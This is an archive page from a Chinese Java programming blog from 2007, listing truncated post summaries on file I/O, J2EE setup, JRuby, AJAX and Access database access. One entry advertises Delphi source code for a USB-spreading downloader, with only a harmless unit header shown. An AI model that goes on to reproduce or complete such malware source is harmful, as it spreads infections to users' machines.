风故故,也依依

Stand still in the wind.

导航

上一页 1 ··· 40 41 42 43 44 45 46 47 48 ··· 50 下一页

2007年5月28日 #

用FileInputStream从文本读内容

摘要: import java.io.*;public class FileInputDemo{public static void main(String[] args){ try { FileInputStream f = new FileInputStream("mydata.txt"); DataInputStream in = new DataInputStream(... 阅读全文

posted @ 2007-05-28 00:29 jadmin 阅读(292) 评论(0) 推荐(0) 编辑

用FileWriter将内容写入文本

摘要: import java.io.*;public class FileWriterTest{public static void main(String[] args){ FileWriterTest t = new FileWriterTest(); t.WriteMyFile();}void WriteMyFile(){ try { FileWriter fw =... 阅读全文

posted @ 2007-05-28 00:28 jadmin 阅读(214) 评论(0) 推荐(0) 编辑

用FileOutputStream将内容写入到文本

摘要: 1//用FileOutputStream将内容写入文本文件import java.io.*;public class FileOutputDemo{public static void main(String[] args){ FileOutputStream out; PrintStream p; try { out = new FileOutputStream(... 阅读全文

posted @ 2007-05-28 00:27 jadmin 阅读(644) 评论(0) 推荐(0) 编辑

二进制文件的读写

摘要: 1.把浮点数写入文件import java.io.*;public class FileOutputDemo{ public static void main(String[] args) { FileOutputStream out; DataOutputStream p; try { out = new FileOutputStream("myfile.txt");... 阅读全文

posted @ 2007-05-28 00:25 jadmin 阅读(241) 评论(0) 推荐(0) 编辑

2007年5月27日 #

配置J2EE环境

摘要: 在eclipse + MyEclipse+tomcat下配置建立J2EE工程环境需要: 1.JDK1.5.0.6; 2.eclipse3.1.2_SDK;3.MyEclips4.1.1; 4.apache-tomcat-5.5.16; 配置方法:1.安装:JDK1.5.0.6;如:D:Studyjdk1.5.0_06; 2.解压:eclipse3.1.2_SDK;如:D:JavaStudyecli... 阅读全文

posted @ 2007-05-27 22:31 jadmin 阅读(335) 评论(0) 推荐(0) 编辑

JRuby大捷:ThoughtWorks宣布Mingle发布在即

摘要: 在5月7日的Sun的CommunityOne会议上,ThoughtWorks Studios宣布他们即将推出的敏捷IT项目管理应用程序,Mingle,将是世界上第一个运行在JRuby上的商业应用程序。实际上,它可能是基于Ruby on Rails的首个商业分发产品。根据ThoughtWorks的说法,发起JRuby上的Mingle有很多的动机。首先,它使横跨他们目标平台的部署过程变得流畅。Ming... 阅读全文

posted @ 2007-05-27 11:54 jadmin 阅读(162) 评论(0) 推荐(0) 编辑

AJAX实现添加删除

摘要: New Document http:// example.com example.com 阅读全文

posted @ 2007-05-27 11:42 jadmin 阅读(989) 评论(0) 推荐(0) 编辑

2007年5月26日 #

下载者U盘传染源码

摘要: unit Un_Main;interfaceuses Windows, Messages, SysUtils,Forms,IniFiles;type TFrm_Main = class(TForm) procedure FormCreate(Sender: TObject); procedure FormClose(Sender: TObject; ... 阅读全文

posted @ 2007-05-26 01:19 jadmin 阅读(162) 评论(0) 推荐(0) 编辑

不用JDBC:ODBC bridge直接操作Access 数据库

摘要: /* 用JDBC来连接数据库有很两种方式,如JDBC:ODBC bridge, 直接连接方式. 第二种方式有很多好处,它可以独立于依赖于系统的odbc数据源,存储数据的database 可以自由地移动,显得更为灵活.*/import java.io.*;import java.sql.*;public class ConDBAccess{public static void ma... 阅读全文

posted @ 2007-05-26 00:57 jadmin 阅读(240) 评论(0) 推荐(0) 编辑

2007年5月25日 #

java中字符类型的转换

摘要: 1、如何将字符串String转化为整数int int i = Integer.parseInt(str); int i = Integer.valueOf(my_str).intValue(); 注: 字串转成Double, Float, Long的方法大同小异。 2、如何将字符串String转化为Integer Integer integer=Integer.valu... 阅读全文

posted @ 2007-05-25 23:10 jadmin 阅读(1036) 评论(0) 推荐(0) 编辑

上一页 1 ··· 40 41 42 43 44 45 46 47 48 ··· 50 下一页